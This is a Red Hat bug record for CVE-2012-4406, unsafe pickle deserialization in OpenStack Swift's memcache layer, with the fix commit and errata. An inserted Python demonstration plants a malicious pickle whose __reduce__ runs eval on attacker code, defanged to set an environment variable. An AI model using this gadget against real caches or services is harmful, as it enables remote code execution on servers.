Bug 854757 (CVE-2012-4406) - CVE-2012-4406 Openstack-Swift: insecure use of python pickle()
Summary: CVE-2012-4406 Openstack-Swift: insecure use of python pickle()
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2012-4406
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 854758 854761 856786 879710
Blocks: 836072 854783 886367
 
Reported: 2012-09-05 18:42 UTC by Kurt Seifried
Modified: 2023-05-12 21:29 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2013-05-25 06:26:36 UTC
Embargoed:


Attachments
CVE-2012-4406-python-pickle.patch (14.26 KB, patch)
2012-09-06 03:22 UTC, Kurt Seifried


Links
System | ID | Private | Priority | Status | Summary | Last Updated
Launchpad | 1006414 | 0 | None | None | None | 2012-09-06 15:45:15 UTC
Red Hat Product Errata | RHSA-2012:1379 | 0 | normal | SHIPPED_LIVE | Important: openstack-swift security update | 2012-10-16 21:44:31 UTC
Red Hat Product Errata | RHSA-2013:0691 | 0 | normal | SHIPPED_LIVE | Important: Red Hat Storage 2.0 security, bug fix, and enhancement update #4 | 2013-03-29 02:21:19 UTC

Description Kurt Seifried 2012-09-05 18:42:45 UTC
Sebastian Krahmer (krahmer) reports:

swift uses pickle to store and load metadata. pickle is insecure
and allows executing arbitrary code in loads().
[...]
BTW, you can read more on executing code via pickle or cPickle here:
http://nadiana.com/python-pickle-insecure

https://bugs.launchpad.net/swift/+bug/1006414

Additionally:

==
Pickle is insecure in a model where an untrusted user can provide the pickled
data. In the Swift model the data is pickled by Swift itself and stored in
memcache, so the attack vector would presuppose direct write access by an
untrusted user to memcached data?

==
memcached on Swift runs on every proxy server and shares a cache, so it binds
on the internal network IP. For Swift we always assume that the internal
network needs to be secure, since Swift has been designed this way.

==
The commit message for the fix:

Reviewed: https://review.openstack.org/9105
Committed: http://github.com/openstack/swift/commit/e1ff51c04554d51616d2845f92ab726cb0e5831a
Submitter: Jenkins
Branch: master

commit e1ff51c04554d51616d2845f92ab726cb0e5831a
Author: Vincent Untz <vuntz>
Date: Thu Jun 21 14:37:41 2012 +0200

    Do not use pickle for serialization in memcache, but JSON

    We don't want to use pickle as it can execute arbitrary code. JSON is
    safer. However, note that it supports serialization for only some
    specific subset of object types; this should be enough for what we need,
    though.

    To avoid issues on upgrades (inability to read pickled values, and cache
    poisoning for old servers not understanding JSON), we add a
    memcache_serialization_support configuration option, with the following
    values:

     0 = older, insecure pickle serialization
     1 = json serialization but pickles can still be read (still insecure)
     2 = json serialization only (secure and the default)

    To avoid an instant full cache flush, existing installations should
    upgrade with 0, then set to 1 and reload, then after some time (24
    hours) set to 2 and reload. Support for 0 and 1 will be removed in
    future versions.

    Part of bug 1006414.

    Change-Id: Id7d6d547b103b4f23ebf5be98b88f09ec6027ce4
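
The report and the fix above are easier to follow with a runnable model. The following is an added example, not code from Swift, from the reporter or from the commit; it models the three memcache_serialization_support modes the commit message describes (0 = pickle, 1 = JSON but old pickles still load, 2 = JSON only) against an in-memory stand-in for memcached, and plants the kind of pickled entry an attacker with write access to the cache would store. The flag values, the class, function and key names, and the environment-variable marker the payload sets are all assumptions made for this demonstration; a real payload would name os.system or subprocess.Popen instead.

```python
import json
import os
import pickle

# Added example, not Swift's or the reporter's code: a miniature model of the
# memcache_serialization_support modes from the commit message (0 = pickle,
# 1 = JSON but old pickles still load, 2 = JSON only). The flag values and all
# class, function and key names below are assumptions made for this demo.

PICKLE_FLAG = 1  # assumed tag recorded beside a pickled entry
JSON_FLAG = 2    # assumed tag recorded beside a JSON entry
MARKER = "SWIFT_PICKLE_DEMO"  # env var the harmless payload sets; assumed name


class MemcacheStore:
    """Constructed in-memory stand-in for the memcached shared by the proxies."""

    def __init__(self):
        self._data = {}

    def set_raw(self, key, flags, payload):
        # Anyone who can reach the memcached port can do this: that is the
        # attacker position discussed in the Launchpad thread.
        self._data[key] = (flags, payload)

    def get_raw(self, key):
        return self._data.get(key)


class MemcacheClient:
    """Reads and writes cache entries according to memcache_serialization_support."""

    def __init__(self, store, serialization_support=2):
        if serialization_support not in (0, 1, 2):
            raise ValueError("memcache_serialization_support must be 0, 1 or 2")
        self.store = store
        self.mode = serialization_support

    def set(self, key, value):
        if self.mode == 0:
            self.store.set_raw(key, PICKLE_FLAG, pickle.dumps(value, protocol=2))
        else:
            # json covers dicts, lists, str, numbers, bool and None only;
            # tuples come back as lists, which is fine for Swift's metadata.
            self.store.set_raw(key, JSON_FLAG, json.dumps(value).encode("utf-8"))

    def get(self, key):
        entry = self.store.get_raw(key)
        if entry is None:
            return None
        flags, payload = entry
        if flags & PICKLE_FLAG:
            if self.mode == 2:
                return None  # secure mode: a pickled entry is a cache miss, never loads()
            return pickle.loads(payload)  # modes 0 and 1 still unpickle: exploitable
        if flags & JSON_FLAG:
            return json.loads(payload.decode("utf-8"))
        return None


class Poison:
    """pickle lets an object name any importable callable plus arguments for
    loads() to invoke. A real payload would name os.system or subprocess.Popen;
    this one only sets an environment variable so the effect is observable."""

    def __reduce__(self):
        code = "__import__('os').environ.setdefault(%r, 'attacker code ran')" % MARKER
        return (eval, (code,))


def poison_cache(store, key):
    """Plant the malicious entry the way an attacker with memcached access would."""
    store.set_raw(key, PICKLE_FLAG, pickle.dumps(Poison(), protocol=2))


def read_poisoned_entry(serialization_support):
    """Return (value the proxy sees, whether attacker code executed) for one mode."""
    store = MemcacheStore()
    poison_cache(store, "account/AUTH_test")
    os.environ.pop(MARKER, None)
    value = MemcacheClient(store, serialization_support).get("account/AUTH_test")
    return value, MARKER in os.environ


def migration_roundtrip():
    """The staged upgrade from the commit message (0, then 1, then 2) keeps the cache."""
    store = MemcacheStore()
    metadata = {"status": 204, "container_count": 3}
    MemcacheClient(store, 0).set("account/AUTH_test", metadata)  # legacy pickled entry
    step1 = MemcacheClient(store, 1)
    still_readable = step1.get("account/AUTH_test")              # mode 1 unpickles old data
    step1.set("account/AUTH_test", still_readable)               # ...and rewrites it as JSON
    final = MemcacheClient(store, 2).get("account/AUTH_test")    # mode 2 reads the JSON copy
    return still_readable, final


if __name__ == "__main__":
    for mode in (0, 1, 2):
        print("mode", mode, "->", read_poisoned_entry(mode))
    print("migration ->", migration_roundtrip())
```

Running it shows why modes 0 and 1 are both called insecure in the commit message: each still calls pickle.loads() on whatever sits in the cache, so the planted entry executes the attacker's callable before the proxy ever looks at the value. Mode 2 never unpickles and treats the same entry as a miss, which is also why jumping straight to 2 on a live cluster discards every existing pickled entry at once (the "instant full cache flush" the staged 0, then 1, then 2 upgrade avoids: mode 1 keeps reading the old entries while rewriting them as JSON).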

Comment 2 Kurt Seifried 2012-09-05 18:51:27 UTC
Created openstack-swift tracking bugs for this issue

Affects: fedora-all [bug 854761]

Comment 3 Kurt Seifried 2012-09-06 03:22:23 UTC
Created attachment 610156 [details]
CVE-2012-4406-python-pickle.patch

Comment 4 Tomas Hoger 2012-09-06 16:24:38 UTC
(In reply to comment #0)
> Sebastian Krahmer reports:

His post is:
http://thread.gmane.org/gmane.comp.security.oss.general/8309

Comment 5 Kurt Seifried 2012-09-12 19:26:16 UTC
Created openstack-swift tracking bugs for this issue

Affects: epel-6 [bug 856786]

Comment 6 Murray McAllister 2012-09-27 02:28:49 UTC
Acknowledgements:

Red Hat would like to thank Sebastian Krahmer of the SUSE Security Team for reporting this issue.

Comment 7 errata-xmlrpc 2012-10-16 17:45:52 UTC
This issue has been addressed in the following products:

  OpenStack Essex for RHEL 6

Via RHSA-2012:1379 https://rhn.redhat.com/errata/RHSA-2012-1379.html

Comment 8 errata-xmlrpc 2013-03-28 22:21:54 UTC
This issue has been addressed in the following products:

  Red Hat Storage 2.0
  Red Hat Storage 2.0 Console
  Native Client for RHEL 5 for Red Hat Storage
  Native Client for RHEL 6 for Red Hat Storage

Via RHSA-2013:0691 https://rhn.redhat.com/errata/RHSA-2013-0691.html

Comment 9 errata-xmlrpc 2013-03-28 22:29:11 UTC
This issue has been addressed in the following products:

  Red Hat Storage 2.0
  Red Hat Storage 2.0 Console
  Native Client for RHEL 5 for Red Hat Storage
  Native Client for RHEL 6 for Red Hat Storage

Via RHSA-2013:0691 https://rhn.redhat.com/errata/RHSA-2013-0691.html

